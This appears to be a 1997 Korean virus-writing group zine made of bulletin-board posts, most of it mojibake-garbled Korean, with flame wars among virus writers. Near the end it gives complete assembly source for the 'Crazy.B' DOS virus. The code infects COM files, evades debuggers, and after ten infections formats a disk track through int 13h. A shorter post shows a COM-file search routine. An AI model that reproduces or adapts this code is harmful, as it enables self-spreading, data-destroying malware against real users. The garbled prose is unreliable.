
 KORVS a                                                     CVC #02  97/09

----------------------------------------------------------------------> Osiris

 KORVS e KORea Virus Society  aa.
 KORVS  CVC (Osiris  e aea.) e aa ụe
KORVS A Abe (e ewe) Miny1 i  ѡAA aᷡa.
 b a ai ha SEX.DAT a Miny1 i ewe aai i b b
Aei aЖa.

   eAe CVC i ae ʁ ea ֔a.
 CVC i i a aЖa.

 A  Жe wӡ qv KORVS b i i  vaa Ae
w׷a  kiminwoo   a Aa a a.

 aé KORVS e Miny1 i ewe aai v ai á g v
qi e av KORVS e aA e sa i ee aa ÷Жa.

  KORVS e ¯ӡ i 񷡷a.

 KORVS e e b ea ae 񷡔a. KORVS  aaie bЁ a
aAbʉ Ѣe E a Ae wӡ ae cA eEa.
 a aA Abe aai a  a Жa.

 Osiris e KORVS a Aaae aA Ab aai CVC #02 A g 
va. a,  aaie aii Ё Abe b eA 
aae i wӡ a a.

  Osiris e KORVS AA iš Η巡 ai aaea.
 a, KORVS AA ⷥ ai h a.

 e KORVS AA a CVC A aai Aae aa.

 qaa CVC Aei ѥeaA ee aaa.

 a  ii e
 i CVC AeA ia wwӡ ese Aei va.
 KORVS  Ae aae  ae a.  aai
 ae šaA ґa  ae KORVS  aae Ёi a
a Жq aӡ iva.


[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] KORVS  aA..
#465/493   孷:PCHacker ⣥     08.16 17:29 A:28 Pg:1/1 :0

ʉ ee aa aA...

q... KORVS  iqA Ёi a  {eA..

Ae a qaae ua..

wa aa a  {sa..



[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] 40hex...
#485/493   孷:10293847 Aw     08.20 15:17 A:26 Pg:1/1 :0

40hex is a smartass
Please know yourself
Try to make virus and show me that
Is it possible ?
You can not be my rival.

 aҁ NirWana  iaʑ (?)  b a.

[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] aa
#603/604   孷:10293847 Aw     08.24 22:13 A:17 Pg:1/2 :0

3e a  xaae.
Aa  aA qѡa aᓡa.
qѡi 3ea xvaaa
΁aaaa
aᓡ ỵii vaea.
b b ie ieAaeA a aaa
...
A 
Miny2i a eisa.
 ʁw ae񷡷ae.
ai A 10a qqaa
šEaqqAA ˥
a a.
 awa ˥.(i q)
aA˥.
AAb ˥.
 1000aa a be a qqAA.
 a.
aba be Aaa3i a  ia sa
(40hex,PCHacker,kiminwoo) CVC A bi {sa.
aeie a asa.

[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] i ɷi esa.
#602/604   孷:10293847 Aw     08.24 21:51 A:13 Pg:1/2 :0

a 30e a.
ӡ qwi aVaa.
 åa A aa.
Aa aae ᷁ eii a.
a 廡 ae iA
a..
Abae a
aeA sa.
åa eie aaa ኁ ኁ .
b ae i aa
åa be i sa.
ҕ...
 Aa  aaa AwaA waAa
a e ae ge.
iӡ a֯sa.
åa i.
e ae aA ie aa ei aa
ae aqi waЁ󓡔a.
i Aa qe abi I a.
e w ae åa ie b aa aa  g
qA aai aaA iae  sa.
ae i a iVe i waaAa
aᓡ ea b...
qѡ xea 3e a e ba.
a....

[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: KORVSaaA e w
#587/604   孷:åa w     08.24 20:02 A:20 Pg:1/5 :0

aaA   i w aaA e ⷥ  w.
a A ee  a a a i...
aaa a wa a aQ  Ё awaa...
aQ w鹱 aa aa...
E i Ӂee a a a aA...

a... A a ii V...

------------------------------------------------------------------
w aaA qѡi Ёַa a e Ai Ήᥡae
A qb v.   ᐡae... a i e we a
b 􋡘A....
ᶁ a ዷi Ё.. qѡa  a g...
 w aa šae ... q... a ae 
qѡa a?  ae... ӡ ia֭.
A i{.  w   a qѡa ae...
 qѡa aa... e ʉi wЁ aa aAi w
e Ai ֓eA... a qѡa aeA aa.
a aaA Ai e aA {e aaa 
ᴡ... e qѡ ʉa ae ea....
weA a ʉi AЁ aq wi ᴡ~~~
aqAe aa ͩϢ Ei awЁe aie  iq
a.
a... w i we qѡa  i a 
A a {e i...  ዷa ..  aa e
e 廡.... i ase... q... aeA i e ᷪ
ae... aviEA....

aa A{e 靡 e i ia.
w aa aAe a ewA geA... ὢA a 
aa .  e  qѡA᷶ geA aeӡ....
 w hexšai e...  Qi ša eae..
xa  Ve....
a a w aae Ё test.bine qa 
a.  a qѡi Ή g... a BaAᝡ w a
aA e .  aa w aa aa.

a... a w aai Ё a AVe... 
eA w  Miny2 ewa ᷁ {...  a
ϩai aa a ᝡ bQie a.
w aaA e e Miny2A Ё ii e KOVa åӡ 
֭.  a qA... a.
aa... aЁe ᢁ {a... aA I aV..
a  ea?  w... ỵi q...
w A Ёa  aaa eA i᷶aa...
wi  Ё  aaA w  aai  
wia.
 w aaa Aaae eq a iA IAa...

aq... w iae qѡA awe ʉ... a aa .
a a y ᝡ a Ёe... a Ё  Ae NOP
i aa g...a w aa a ኅ....
aa... aa ỡ gA eie... a w aa
a ЗA aA A...
q... a... A...  a ee aq ... q Aa b...

A.... w i w iae  qѡǥ i xaa
... a A  aa a V?
.... aaa a aaa a...
b eA... ᗡ a ...

a |a a a ee aai Ёia aae...
Ae 3a i x.

  AáaA qѡA 0i a i...
  wⷥ aa ....
  b ae ieA a i...

a e...
------------------------------------------------------------------

ᷡw ȁ i... ᝡ wӡ sa~
qi   ga...
a... e b qi a aa... w eiẉ aq
qi wЖa Ёia a aa...
a we.. ae aa...

[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] eA aa a ϩaa
#577/604   孷:åa w     08.24 19:37 A:18 Pg:1/1 :0

a ϩaa ae ...
i a a ai ... aa ei eae
 a |A  ge NOP...weӡ iicA e a
V?
ii ϩaa e  a eA awa sei ee..

a... b e aq a ae...   wá 
gaa... ᷡw aqi e i eAe i a ii..
a ᑥ i a ᑥ ii aЁe ae aqi  a
b aA Ё i iA IA.. ӡ i g Ё e b
  aA a i... ӡ i..

a... ᷡw awa i iu ae...
a,.... iha a a va~

A: [sq] aa A=BaA
#573/604   孷:åa w     08.24 19:12 A:18 Pg:1/1 :0

a aa...
aa Aa Ba Aᴡ....
q... A ᷡw ii a aV?

iae a... A A˷ eЁ֐aA...
a aqw... a ii eq eaa ga...
b } ... a aa eae  aaaia ae...
a aϡ ae ů ...  aa a a...
eeaA aaa... Aa  eiea...

qe aAi  i... b } .. a i ae...
a q  aAӡ a aaaA...
wᝡ E a wЁ..

[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] wi wӡ ᴡ~
#570/604   孷:åa w     08.24 19:10 A:18 Pg:1/1 :0

a e qѡa aae...
a... a iae a aeA  waV...
aA... a ᢁ Aáa aa ....
   wȁA i Aai ewЁ a a ˥i 
e e a?


[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] aA bae~
#568/604   孷:åa w     08.24 19:08 A:19 Pg:1/1 :0

aa Aᝡ a e a...
᷁ aa ~~~
a a e ᐁe A...
a a e a aa e... Ea...
a qae Ё~
a...  AáaA a debugaa A...
AwA a Aáe a e e  ae...
 i e  a~

ᝡe AFDa ᥡ , šaA, aa aa {e eeA g...
bQiᕡ  i... ae Ÿ ɷsŉwa a ee ga~

b ae a ᖁe.. i qAA a...


[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] ae aqi ᷁ bi...
#565/604   孷:åa w     08.24 19:00 A:19 Pg:1/1 :0

ae aqi ᷁ bi waЁV...
a  aai hae i~

a aa... aa vaa ... vaa ...
be aqieA iɷiaVe...
aeA A vq...

e a eA... a qѡa aa...
A  aa qaa... aA e a iᑽ...
aA ᷁ ba?
e bi... a a waeA?

a...  ba aAa... aa... aa~~

[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] . Aa?
#563/604   孷:åa w     08.24 18:57 A:19 Pg:1/2 :0

.  ኅ...
a . A?
aA qѡa A᷶a?
a a.... a . A?
aa Ae a ͱa ?
a w qѡa Ж... ae i ϡaae bi iev
a A iae... qѡa aa a aa a...
Ae .a a...
aa... qѡa eA᷶eA.....
a i ae~

ai  a ...
aeA ba ӥa ba aa~
we...  qѡi Ж...(b )
᷁ aae A aa q ~
e b e ae...
A a aaA Ё a aaa..
寢a ei ϡ.... e a ae bi...
eAЁae~

[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] e g 韥A
#560/604   孷:åa w     08.24 18:50 A:17 Pg:1/1 :0

qѡa a qѡa a...
iAe qѡ  ᗥa xaa e uq...

qѡ?  aA qѡe... e w~


[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] qѡa a
#558/604   孷:åa w     08.24 18:48 A:18 Pg:1/1 :0

锁 qѡa a...  qѡa aeA....
s...
 aa qѡa  aa?
Aa ie ba ae....
e b ?
᷁ a Aáe aa i aaa~


[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] aa... A iva aַq~
#547/604   孷:åa w     08.24 16:43 A:15 Pg:1/3 :0

e ᕡ w  AA qa ba e 3eA 
aai ei  aqa....
 a ae lamer... qi eA á ae 
a...
ae ae ᗡ qaᶡ qeA aa eea a gv...
a Aa ee aaa AwA Aa ia Ж..
A Aᓡa.....
 E A va....  ei b a~

a a e ae.... ie 10293847....
qa Aaae AA  ieA a ie a...
b ae....
q Aaae a  ieA ae aq a  ge...
a  Aai e b a aq... ae a ~
aa e lamere aa?
a... qѡ A 0ᑽ.... aA iee ia?
a qѡa ae 0i  i qѡ ˥ Ai A
Жᴡ...
a qѡ ˥ Ai Aa eae w a aa
aAi Aa Ёa ЕA.... Ѣ a  a
e eEe aa.... a... aA aЁᷥA wa
a...
qѡ ˥ AЁ aa i aaa.... a i..
Aaa.... qѡa ae...
qѡa AwA Ёָa ϩae aiA eae aqe
w qa

aᓡa... ͡aa aa sӡe ỡ~

q iЁVeA.... ᕡ 1ei bae aai eie
sӡ ӱaa....  1ee ˡ e e eiᥡ
....
ʉa wa i...
a ba...

[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] ᗡa  iЁa~
#546/604   孷:åa w     08.24 16:09 A:20 Pg:1/2 :0

a e 514 i ᗡa .. iЁa~
a wqA a e ֻe....
iš e A....

Ѣ... w aai A....
com_mask '*.com',0

mov ah, 4eh
mov dx, offset com_mask
mov cx, 7
int 21h

A ae ˥i  ae  ae aA?

 e A com¸wai a i xa qqǡA
A᷶A.... a Aa a... ¸wai ae
i qqEae a~
Ёe i..

.... Aa Aa Зi a geae
e hwp{e ¸wai coma a Зaa~
ae Зǡaaa we Aa aa...
˷ Aa Ё aỡ.... Ae Зǡe..

Aᕡ A ae  bЁ?

[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] aa.. Ai aa?
#545/604   孷:åa w     08.24 16:03 A:20 Pg:1/2 :0

w{... ʉ cA eae aqie...
aA ii ~
aa ei ʉa wa.... qi eiᑥ ˥i
A ЁЁ.... qѡ ae A 0a ᑽ...
KORVS A  a Miny2  ewa? aa~
Miny2 ew aa... Miny2ኁe.. ~
w Miny2 ewi e... a a....
 'aqe ˥i Ёae  Aa ea....'

aa A Ё A wЁ i A wa
e i a ae... A aai eaa...
a... ᷡw...VCLa PS-MPCaᝡ ei ii...
a... aa eie aeA awЁ  e aa
i eia aỡ... a靡 aa aA ae~
aዡ a aሁ ei... ae aq ЗAae i
 a aqi e  aa~~~
ᕡ a e aqiA w a ae aqi gae
Ai ieA aeaa~
ỵi ae a...
ieᕡ Ae bЁ aeӡ Ặᓡ... i b e 
a i baA.... iha~


[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] A eЁe...
#536/604   孷:åa w     08.24 00:23 A:24 Pg:1/2 :0

A eЁe aa 10293847 PCHackerAA e uⷩa eeA
aa eAa...
 A LBCaa w... virsus messge njh to LBCa ia
gaa... a waA iaae.... a aa  b
(njh ŝe e) LBCe åAA a bi a aa
eeA aa bi Еa...
a aea PCHackerAA e a bi ЁVa
ee usa....  e  VCL{e ʉi we廡... w
i  gAa.

lamera A eAeA... q... e A  wi aeA 
gia a....  aai ae Зe  Aa aЁ
 a  aAЁ a gia Aa.
Aa ie yy Ae  aaaA CVCae aa AǷ eA
a ae i i sa.  aaae A h ᶅ Aa.
   sw~~


[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] AeA aae  a~
#524/604   孷:åa w     08.23 16:56 A:22 Pg:1/1 :0

AeA aae ... a  ge a sa.
 a... ai  a Ae...  Ae 
a iaae e.... a a e e wӡ iavsa.
ai a ɕ wi ɷЁa~

a a ɕ ae PS-MPC, NRLGA eee ʉi wЁ aai
 eeae 󓡔a.
ae 01410wA e a a Aai ɷЁ, Awe A˩ˡ
awaii a a sa.
q ... Lamerea?

aA....  Aa  ge aiA e i a a?
a... ae~~~

a  ae Lamerae A Ё  Ё aVsa.
ᐡa?  aaa... a A e a e Sa~
Lamere w aA e qia aa.
a e aq  aae Lamera aaa... aA bЖe
A... aa AAe Lameri awae be w sa.

XXX is lamer~!
OOO group is lamer rat's group~
....  a...
 e aaA b va?
ɷ ae aqa ae ai Lamera ie....
ww b e ... q aai q aa Aaa
e a  eea a e aqiAA ỵii a...
 ae a eiᑥ ʉAe Ё eae be aqii e
ia.    i ae  ១~! aa bi iaa?
aae a eia e ae... e ́巡 sa.
ɷ wA aA a ga.  aa Aaa A aq 
e ́巡 A... a a ee aaa A ui w 
a.  A wa w aaA aaa a~
wⷡ gae ae aqi bi e wa ga.
VXeri bae e  '  qi Ae a i ~'
  ga.

i....Lamera A g Ё iӡ bsw~
aaA ӥ i  {~

A: [巁] a aesa~!
#522/604   孷:åa w     08.23 16:32 A:15 Pg:1/2 :0

A ᝡ a i Aa  qaa.
A e e 鷡 Ae  a.... aϡ a ᣡi ae
u eA...  aa?
a A?
Ai aa, a a ϩae iu...
e e Aia i aaAa g ggaa...
ᝡ  iaa...
ae  ae, ae  aaae... ae qA a
a.

aa ae  妁, qii iaae aA qi aa
e.... Aa a e åi aa a ѩ A
a(a wae a *^^*) ɷi Ёi....
aᓡ a aụ iaa....
qi  ga a ae a ЖeA...   a
i iae Aa ....
10293847...CVC aᦅi qe qa aᶅ aA ww
i eae,  ae ỡ gviEAa....

eibe  aӡ bЁa.
A aa aq i  wsⷡ ea q
aa.... aua aᶅ Ёsa.
aᶑ wqi ae a.

a e~

[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] a ѡwa Ёa.
#514/604   孷:åa w     08.23 06:46 A:36 Pg:1/3 :0


q... a bbi avaa.
ᕡ 10293847 aae ea ֋ A...
10293847 aaa  A Ё ii we aa.
ae iqaaA aae aa Comi qqǡe a 
ea.  Comi qqǡe aae  i ¸waa Com
i aЁ xae qqǡ, ae qqǡ ge wA
Ёwaa.  Ӂa ӡ iae wa.

a, MS-DOSa aae Ae Зwi com, bat, exe
Ai a ae ( a sae)  i ae
wa.

 Зi ae Aa ieA Ae a gs
a.   ⷥ aa e  aa.  a Aa 
a ¸wai coma a ЗЁAa.  e Ae
a a Зǡa i󓡔a.   З eA Aa a
e... ae e ab we Ae aa iVe ia.
wA aa ˷ A aVa....

a A A A... aa aeaa.
З  a Ё Comi AaaaeA...
a we aw ¸wa ae cA sa.
З Aa e a ¸wa Ё Ae A
AA  ia e Aae  bЁe I󓡔a.
AAA e Aaa З šaa a e 0 1
ụ Aa iᵩae  bae  waVa.
aa ¸wai coma aae a  b aaA qq
AA Aa... Aa w qqa Ё Aaa aASa.
 eⷥ Com qq aai ɷE ewa.
( i Com¸waA we aa aaa qqǡ
 aq A aa aa i aa, aae Зe 
 A   aaA A A aae wa gsa.)
10293847 a aa.
 a a aa{e Ae w i󓡔a.
a a aae aae  ЗI A qq
ỡe , Aa  ¸wai a qq ae
e e ¸waa Coma a a a ae Aa.

iqi iᥡ aai e啡 eᥡu aAa?
q... a ae aai aa qqǩ a ˥i wa
ei ia aAa.  w З ¸wai Ё 
i xa, qqǡe ˥ aa.

a e~


[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: 10293847
#513/604   孷:ѡwa      08.23 00:05 A:31 Pg:1/1 :0

i Ё eae
1...7   aa g aኅa

a(a ¸wai COMa aᓡ) qq Aaa.
a a aea?

aa eA a w ab ១ኅa
228aava?

q aỡ aAa.
ҕ~~~~~~~~~~~~~~~~~~~~~~~~~
i
40hexeA aa...

[ 40HEX(HEX) ] aa e  (qwa: 40hex)
A: [sq] Asa~
#635/647   孷:åa w     08.27 00:45 A:27 Pg:1/3 :0

Asa.... aA ᘁA ge aqi i wa靡
Aa.... e Aa a aq a.... i  aA a
 ge aqA....  baa  ee waaa....
 aA AA iᥡ ѡwa iAЁ eie
iA Ae... e ae ᕡ aa iieq Ё៥ w
ea.

a ae iA ee aqe e... a lamerAAe ѡ a
aq sa.
ii iᥡ Ba Aa  a... A᷁ b a A
 aba  ae.... q aaA yA , ʉ a
a eea.... AA EAae aqA....
a aq a  e  Iᕡ a... ӡa ae aq
ae aǡe |a 韱 I a e waa 
sa.

aa.... a aqe ae s q.... aa~
vae.... a  we ... a ӡ aae Ae
aa?  a A aa {a ewae.....
q.... ᷡw iae.... ӡa   wiu aAa...

ȂA aée A aaå AaeA x¡ avsa.
Aw aé aa  }a....

 AA  aae aqa wӡ Vsa.
ae iAe  A  Aei e aq waA Ё...
a e ai aa.
Aa ae a a  Ё aaa.
aᶅ aqa ЁЁ ....
|ae { bi qЁ... a ae  ae
Va~

a... HACKER0 weA a Aae iqi a sa.
e e a e.... e A ei ae A Ё...

q eae aqa i } Vsa.
a e~

---------------------------------------------------------------- !!!!!!!

  aqe KORVS A  aa aa.
  ge aai a e a. ae, e w 
a a Жae  iea.  wi Qi Жi Ae a
ae aaa I  a. Ia aU q a ia.

CR segment para 'CR'
   ASSUME  cs:CR,ds:CR
   org 100h

crazy:      inc al
            cmp al,10                   ;iA et
            je  start                   ;
            jmp crazy                   ;
            loop crazy                  ;

start:     sub bp,bp                    ; awai  e iA et
           db 0280h  dup(90h)
           sub bp,bp
           db 0280h  dup(90h)
           sub bp,bp
           db 0280h  dup(90h)
           sub bp,bp
           db 0280h  dup(90h)
           mov ax,3524h                 ; a24 ១˥.
           int 21h
           mov word ptr [bp+old24],bx
           mov word ptr [bp+old24+2],es
           mov ah,25h
           lea dx,[bp+offset old24]
           int 21h
           push cs
           pop es


            push cs
            pop  ds
            mov dx,offset trick   ;aa (eaaa  qa)
            mov ax,2501h
            int 21h
            mov al,03h
            int 21h
            jmp a
trick:      iret

A:          mov si,offset next + 100h
            mov cx,offset end_virus - next ; qѡ {e a 0tae aa.
            push cs
            pop ds
 v_loop:    xor byte ptr ds:[si],00
            nop
            inc si
            dec cx
            jnz v_loop
            call dxaa


 next:      pop   bp                   ; e 2i Avq. (勡wA qaaa)
            sub   bp,offset next       ; BP bá q


            lea   si,COM_head[BP]       ;
            mov   di,100h               ; COM  
            push  di                    ;
            movsw                       ;
            movsb                       ;

            mov   cx,0080h              ; DTA  a PSP a AA
            mov   si,0080h              ;  Ia.
            lea   di,End_Virus[BP]      ;
            repz  movsb                 ;

            mov   ah,4Eh                ;  ዡ
            mov   cx,00100011B
            lea   dx,Match_COM[BP]
            jmp   find

dxaa:       push  cs
            pop   ds
            mov   dx,offset trick     ;a.
            mov    ax,2501h
            int   21h
            mov  al,03h
            int  21h
            jmp  next

find:        cmp   dl,3    ;axq.
             je    close
             int   21h
             jnc   ChkInfected

 Restart:

            lea   si,End_Virus[BP]      ;  DTA 
            mov   di,0080h
            mov   cx,0080h
            repz  movsb
            RET

ChkInfected:  cmp   byte ptr total,10 ;qqE a 10a?
              je    msg   ;10e aA˥a ΁
              mov   bx,80h; command១ ˥
              mov   ax,word ptr [bx]+35
              cmp   ax,'DN'
              jz    close
              mov   al,DS:[0096h]
              and   al,1Fh
              cmp   al,1Fh
              jnz   Infect ; xae qq.
              mov   ah,4fh
              jmp   find   ;ae xq


close:        mov  ah,3eh ;a h
              int  21h

              mov ax,2524h ; a a
              lds dx,[bp+offset old24]
              int 21h
              push cs
              pop ds

              jmp  restart ; a b

msg:          mov  dx,offset virus
              mov  ah,9   ;AA b
              int  21h
              jmp  ddd    ;aA˥ ѡ


DDD:          mov ah,19h  ;ai ͡UǱ
              int 21h

              mov dl,al                 ; aa aae ͡ ǩ  a.
              mov ah,5                  ; 90 eA a   wi
              mov al,9                  ; a a ֊
              lea bx,marker
              push cs
              pop es
              mov ch,0
              mov cl,1
              mov dh,0
              int 13h

              int 20h

marker        db 0
              db 0
              db 1
              db 2


    Infect:                             ; 勡w ai
            mov   ax,4301h              ; / ԁI a
            xor   cx,cx
            mov   dx,009Eh
            int   21h
            jc    restart               ; Qᯡ DTA 2 a

            mov   ax,3D02h              ;  e
            int   21h

            xchg  ax,bx                 ;  i x

            mov   ax,5700h              ;  W e x
            int   21h
            push  cx                    ; W e I
            push  dx

            mov   ah,3Fh               ; Iہۅ 
            lea   dx,COM_Head[BP]       ; q iԀ
            mov   cx,0003               ; 3 aa
            int   21h

            mov   al,02                 ;  {I 
            call  lseek
            cmp   ax,1000               ; aaa aaa ba bae ͡
            jb    end3

            sub   ax,3                  ; at e
            mov   word ptr JumpCode[BP+1],ax     ;

            mov   ah,40h              ; aa 
            mov   cx,offset End_virus - 3 - 2
            lea   dx,start[BP]
            int   21h


            mov   al,00                 ; qAI 
            call  lseek

            mov   ah,40h                 ; a a 
            mov   cx,0003
            lea   dx,JumpCode[BP]
            int   21h

            pop   dx                    ;  W e 2
            pop   cx                    ;
            or    cx,+1Fh               ; 62  ei
            mov   ax,5701h              ;
            int   21h
            inc   total
            inc   dl
            mov   ah,4fh
            jmp   find

 end3:      int 20h

 lseek:
            xor   cx,cx
            xor   dx,dx
            mov   ah,42h
            int   21h
            ret

 total      db    0
 COM_head   db    0CDh,20h,90h          ; COM Iہۅ
 Match_COM  db    '*.com',00
 old24      dd      ?
 up         db    '..',00  ;e e aaA ϩa e .
 virus      db    'Crazy.B Virus',0dh,0ah
            db    '[KORVS]',0dh,0ah,'$'
 JumpCode   db    0E9h
            db    ?,?



 End_Virus:
      sub bp,bp
      db 0280h dup(90h) ; awa .
cr   ends
     end crazy

a  ewaAa?
Aa i.
i aeЁ Esa.
a ii a.
aᦅ iaa Aaa
Aa ee aa  qaAa
2i Avsa.
靡 aa g eia
ae aai ei ae
AAi áAa
a qᕡ aiesa.
aw w e.
PCHacer,kiminwoo,40hex..
......................
b e ia.
. åa ҕ...
b ae  ge a ae {sa.
ҁ.............
a ....
aa e a Ae.
ie áaAa...
aa.....


